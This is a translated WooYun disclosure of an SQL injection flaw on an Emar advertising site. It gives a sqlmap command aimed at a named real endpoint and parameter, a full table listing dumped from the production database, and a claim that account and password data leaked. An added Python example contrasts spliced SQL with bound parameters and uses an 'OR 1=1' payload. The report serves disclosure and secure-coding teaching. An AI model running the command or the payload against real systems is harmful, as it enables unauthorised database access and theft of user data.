Vulnerability summary
Defect ID: wooyun-2016-0169868
Title: A site under 亿玛 (Emar) has an injection vulnerability
Vendor: emar.com
Author: 头晕脑壳疼
Submitted: 2016-01-14 15:07
Fixed: 2016-01-19 18:20
Disclosed: 2016-01-19 18:20
Vulnerability type: SQL injection
Severity: High
Self-assessed Rank: 15
Status: The vendor was notified of the vulnerability but ignored it
Source: http://www.wooyun.org; for questions or help, contact [email protected]
Tags: none
Vulnerability details
Disclosure status:
2016-01-14: Details sent to the vendor, awaiting the vendor's response
2016-01-19: The vendor actively ignored the vulnerability; details disclosed to the public
Brief description:
Could this be a first report? Keep the title short and to the point (how much of this information does only the vendor know?)
Detailed description:
Injection point: sqlmap -u "http://qd.emaradx.com/agentquery.do" --data "agentName=11111"
Database: adx_accurate
+--------------------------------------+---------+
| Table | Entries |
+--------------------------------------+---------+
| ad_zone_daily_stat | 2680937 |
| advertiser_consume_log_20150911 | 994440 |
| advertiser_consume_log_20151116 | 990472 |
| advertiser_consume_log | 986504 |
| advertiser_consume_log_20150402 | 986246 |
| advertiser_consume_log_20150325 | 986141 |
| advertiser_consume_log_20150304 | 986051 |
| advertiser_consume_log_20150303 | 986049 |
| advertiser_consume_log0305 | 986012 |
| advertiser_consume_log_0204bak | 985720 |
| advertiser_consume_log_20150104 | 985421 |
| advertiser_consume_log_201201bak | 985056 |
| advertiser_consume_log_copy | 984248 |
| advertiser_consume_log_0915bak | 984144 |
| advertiser_consume_log_0902bak | 983917 |
| advertiser_consume_log_0808bak | 983155 |
| advertiser_consume_log_0730bak | 982930 |
| advertiser_consume_log_0714bak | 982528 |
| advertiser_consume_log_0710bak | 982421 |
| advertiser_consume_log_0709bak | 982332 |
| advertiser_consume_log_0604bak | 980960 |
| advertiser_consume_log_0603bak | 980931 |
| advertiser_consume_log_0418bak | 980019 |
| advertiser_consume_log_0417bak | 979994 |
| advertiser_consume_log_0415bak | 979942 |
| advertiser_consume_log_0304bak | 978931 |
| advertiser_withholding_log_0915bak | 363810 |
| advertiser_withholding_log | 363679 |
| advertiser_withholding_log_0902bak | 363486 |
| advertiser_withholding_log_0709bak | 360804 |
| advertiser_withholding_log_0604bak | 358599 |
| advertiser_withholding_log_0603bak | 358566 |
| advertiser_withholding_log_0429bak | 357507 |
| advertiser_withholding_log_0418bak | 357227 |
| advertiser_withholding_log_0417bak | 357195 |
| advertiser_withholding_log_0415bak | 357108 |
| advertiser_withholding_log_0402bak | 356584 |
| advertiser_withholding_log_0304bak | 355634 |
| daily_stat_hadoop | 229440 |
| daily_stat_201311 | 131784 |
| ad_zone_access_message | 128955 |
| daily_stat_201312 | 120768 |
| ad_zone_effect_track_cps | 118446 |
| daily_stat_hadoop_0710bak | 107767 |
| daily_stat_hadoop_0711bak | 103253 |
| daily_stat_hadoop_070909bak | 102695 |
| daily_stat_hadoop_0708bak | 95842 |
| campaign_ssp_ad_count_info | 91582 |
| daily_stat_history | 83312 |
| daily_stat_201401_0228bak | 76877 |
| daily_stat_201401_0409bak | 76877 |
| daily_stat_201401 | 76805 |
| daily_stat_hadoop_0714bak | 74908 |
| daily_stat_hadoop_0328bak | 74757 |
| daily_stat_201310 | 71546 |
| daily_stat_hadoop_0401bak | 63848 |
| daily_stat_hadoop_07202057bak | 63715 |
| daily_stat_effect_hadoop_0401bak | 56377 |
| daily_stat_hadoop_0304bak | 55823 |
| credit_score_log | 53669 |
| daily_stat_hadoop_0731bak | 53203 |
| daily_stat_hadoop_0730bak | 51668 |
| daily_stat_effect_hadoop_0304bak | 48521 |
| reg_user | 43373 |
| user_account | 43372 |
| user_account_20150907bak | 43372 |
| user_account_20150911 | 43372 |
| user_account_20151116 | 43372 |
| user_account_1121bak | 43364 |
| user_account_1122bak | 43364 |
| user_account_0915bak | 43357 |
| user_account_0902bak | 43356 |
| user_account_0822bak | 43350 |
| user_account_0808bak | 43345 |
| user_account_0730bak | 43343 |
| user_account_0709bak | 43340 |
| user_account_0710bak | 43340 |
| user_account_0714bak | 43340 |
| user_account_0603bak | 43328 |
| user_account_0604bak | 43328 |
| reg_user_20140507 | 43306 |
| user_account_0415bak | 43300 |
| user_account_0417bak | 43300 |
| user_account_0418bak | 43300 |
| user_account_0402bak | 43296 |
| user_account_0304bak | 43290 |
| daily_stat_201406 | 41170 |
| daily_stat_201406_0630bak | 39701 |
| daily_stat_201403_0404bak | 34209 |
| daily_stat_201403_copy | 34209 |
| daily_stat_201403 | 34192 |
| daily_stat_hadoop_0225bak | 30453 |
| daily_stat_effect_hadoop_0225bak | 26934 |
| daily_stat_201407_0808bak | 22928 |
| daily_stat_201407 | 22901 |
| daily_stat_201408 | 22776 |
| daily_stat_201407_0730bak | 21790 |
| daily_stat_201405 | 19086 |
| ad_zone_effect_track_cps_yqf | 18426 |
| ad_order_product_info | 18399 |
| daily_stat_201404 | 17516 |
| daily_stat_hadoop_0221bak | 15168 |
| daily_stat_effect_hadoop_0709fix | 13650 |
| daily_stat_201402_0305bak | 12384 |
| daily_stat_effect_hadoop_0304fix | 12106 |
| daily_stat_201402_0228bak | 12095 |
| daily_stat_201402 | 12005 |
| daily_stat_201402_0325bak | 12002 |
| daily_stat_201402_0328bak | 12002 |
| daily_stat_201407_0714bak | 12002 |
| daily_stat_201402_0304bak | 11849 |
| daily_stat_effect_hadoop_0221bak | 10585 |
| daily_stat_201407_0710bak | 9899 |
| daily_stat_201411bak | 9454 |
| daily_stat_201411 | 9446 |
| adboard | 8908 |
| daily_stat_201407_0709bak | 8612 |
| daily_stat_effect_hadoop_0220bak | 8444 |
| daily_stat_hadoop_0220bak | 8249 |
| campaign_x_region | 8196 |
| campaign_x_adboard | 8148 |
| daily_stat_201412 | 8089 |
| adboard_x_ssp_status | 8042 |
| daily_stat_201412_20150104 | 7819 |
| daily_stat_effect_hadoop_0214bak | 7700 |
| adboard_x_adcode | 7630 |
| daily_stat_201407_0708bak | 7387 |
| daily_stat_hadoop_0214bak | 7223 |
| daily_stat_effect_hadoop_0219bak | 7184 |
| daily_stat_hadoop_0219bak | 7002 |
| daily_stat_effect_hadoop_0228fix | 6904 |
| daily_stat_effect_hadoop_0226fix | 6877 |
| daily_stat_201501 | 6716 |
| daily_stat_201501_0204bak | 6715 |
| advertiser_investment_log | 6084 |
| ad_order_info | 6049 |
| advertiser_investment_log_0504 | 5944 |
| advertiser_investment_log_0304bak | 5926 |
| daily_stat_201409_1009bak | 5827 |
| daily_stat_201409 | 5568 |
| campaign_x_schedule | 5408 |
| daily_stat_201410 | 4932 |
| advertiser_plan_consume_log | 4854 |
| campaign_x_ssp_status | 4555 |
| daily_stat_effect_hadoop_0709re | 4552 |
| plan_consume_temp | 4465 |
| campaign_x_filter_url | 4429 |
| egao_pay | 4030 |
| daily_stat_201409_bak1 | 3707 |
| daily_stat_201503_0402 | 3624 |
| daily_stat_201503 | 3588 |
| area | 3305 |
| region | 3235 |
| campaign_x_topic | 3070 |
| daily_stat_201504 | 2815 |
| user_account_history | 2338 |
| plan_x_campaign | 2169 |
| agent_investment_log | 2163 |
| daily_stat_201409_0915bak | 2157 |
| campaign | 2132 |
| ad_zone | 2099 |
| daily_stat_201502_0304bak | 2048 |
| daily_stat_201502_bak | 2048 |
| ad_company | 2013 |
| daily_stat_201502 | 2001 |
| daily_stat_201502_0305 | 2000 |
| um_role_func_rule | 1890 |
| campaign_x_adzone | 1792 |
| campaign_1009bak | 1752 |
| ad_company_20140507 | 1738 |
| campaign_0915bak | 1641 |
| daily_stat_effect_hadoop | 1605 |
| agent_transfer_log | 1359 |
| campaign_x_prefer | 1268 |
| ad_cost | 1070 |
| daily_stat_201410_copy | 996 |
| campaign_ssp_ad_info | 886 |
| campaign_x_interest | 829 |
| daily_stat_201505 | 754 |
| adboard_x_adcode_0227bak | 678 |
| ad_zone_daily_stat_0324 | 663 |
| campaign_x_profession | 545 |
| adx_click | 462 |
| agent_application | 394 |
| yigaodepatment | 393 |
| campaign_x_age_section | 338 |
| daily_stat_effect_hadoop_0225fix | 331 |
| plan | 326 |
| sync_log | 304 |
| campaign_x_pdt_category | 275 |
| um_user | 249 |
| user_detail | 248 |
| um_func | 213 |
| um_func_0423bak | 203 |
| ad_zone_bak3 | 199 |
| ad_zone_bak4 | 199 |
| daily_stat_201503_0305 | 191 |
| um_role_user | 181 |
| rroc_errorlog | 176 |
| ad_zone_bak | 160 |
| ad_zone_bak1 | 160 |
| ad_zone_history_data | 133 |
| plat_product_category | 119 |
| campaign_x_sex | 115 |
| campaign_history_data | 91 |
| agent_account | 65 |
| agent_user | 65 |
| agent_user_20140507 | 61 |
| `size` | 58 |
| accurate_code | 57 |
| advertiser_plan_consume_log_20141015 | 57 |
| adboard_group | 56 |
| campaign_x_priority | 51 |
| campaign_x_rt | 51 |
| campaign_x_adboard_group | 48 |
| carousel_form | 44 |
| unit | 34 |
| daily_stat_201410bak1 | 31 |
| um_role | 31 |
| topic | 29 |
| reguser_yqfcampaign | 27 |
| media_categroy | 26 |
| campaign_category | 25 |
| department | 25 |
| unit_20140507 | 23 |
| dept_unit | 22 |
| mas_code | 22 |
| consume_preference | 20 |
| mediatype | 18 |
| mediatype_20140507 | 18 |
| interest | 15 |
| company | 14 |
| ecom | 11 |
| ecom_20140507 | 11 |
| cost_log | 8 |
| eight | 8 |
| profession | 8 |
| advertiser_consume_log_201506 | 7 |
| advertiser_consume_log_201508 | 7 |
| adx_eamil_data_templet | 7 |
| adx_eamil_send_user | 7 |
| user_x_adwiser | 7 |
| advertiser_consume_log_201507 | 6 |
| paytype | 5 |
| paytype_20140507 | 5 |
| plan_warn_setting | 5 |
| adboard_audit_detail | 4 |
| user_account_bak | 4 |
| campaign_x_rturl | 3 |
| test | 2 |
| alg_parameter | 1 |
| plan_strategy | 1 |
| um_rule | 1 |
| user_account_0228bak | 1 |
+--------------------------------------+---------+
Leaked data includes user accounts, passwords, phone numbers, email addresses, and more.
Proof of vulnerability:
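The report shows that the POST parameter agentName of agentquery.do is injectable but leaves the fix section empty. The following is an added example, not code from the original report or from the vendor: it reproduces the defect class on an in-memory SQLite database with constructed sample rows and places the vulnerable pattern (input spliced into the SQL text) beside the hardened one (input bound as a query parameter). The table name agent_account and its columns are assumptions borrowed from the dump above, not the site's real schema.

```python
"""Vulnerable vs. hardened handling of one query parameter (added example, not the page's code)."""
import sqlite3


def build_db() -> sqlite3.Connection:
    """Create an in-memory database with a constructed agent_account table (assumed schema)."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE agent_account (id INTEGER PRIMARY KEY, agent_name TEXT, email TEXT)"
    )
    # Constructed sample rows; the apostrophe in O'Brien is a legitimate value.
    conn.executemany(
        "INSERT INTO agent_account (agent_name, email) VALUES (?, ?)",
        [
            ("alice", "alice@example.invalid"),
            ("O'Brien", "obrien@example.invalid"),
            ("carol", "carol@example.invalid"),
        ],
    )
    return conn


def query_agent_vulnerable(conn: sqlite3.Connection, agent_name: str) -> list:
    """Defective pattern: the request parameter becomes part of the SQL text."""
    sql = (
        "SELECT agent_name, email FROM agent_account WHERE agent_name = '"
        + agent_name
        + "'"
    )
    return conn.execute(sql).fetchall()


def query_agent_hardened(conn: sqlite3.Connection, agent_name: str) -> list:
    """Fixed pattern: the parameter is bound by the driver and can only ever be data."""
    sql = "SELECT agent_name, email FROM agent_account WHERE agent_name = ?"
    return conn.execute(sql, (agent_name,)).fetchall()


def compare(agent_name: str) -> dict:
    """Run both variants on the same input; report row counts, or the error the vulnerable one raises."""
    conn = build_db()
    try:
        vulnerable = len(query_agent_vulnerable(conn, agent_name))
    except sqlite3.OperationalError as exc:
        # A malformed statement: the symptom that error-based scanners such as sqlmap key on.
        vulnerable = f"error: {exc}"
    hardened = len(query_agent_hardened(conn, agent_name))
    conn.close()
    return {"vulnerable": vulnerable, "hardened": hardened}


if __name__ == "__main__":
    print(compare("alice"))         # both variants: 1 row
    print(compare("O'Brien"))       # vulnerable: SQL syntax error; hardened: 1 row
    print(compare("x' OR '1'='1"))  # vulnerable: every row; hardened: 0 rows
```

The second input shows why concatenation is a correctness bug before it is a security bug: a legitimate name containing a quote breaks the statement, which is exactly the signal a scanner uses to detect the weakness. The third input shows the exposure the report describes: with string splicing, a value that is never a real agent name returns the whole table, whereas the bound parameter matches nothing. Bound parameters, not input filtering, are the fix; the same applies to any JDBC or ORM query the real endpoint uses.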
Fix recommendation:
Copyright notice: when reposting, please credit the source: 头晕脑壳疼@乌云
Vulnerability response
Vendor response:
Severity: No impact; vendor ignored
Ignored at: 2016-01-19 18:20
Vendor reply:
Vulnerability Rank: 4 (WooYun rating)
Latest status:
None yet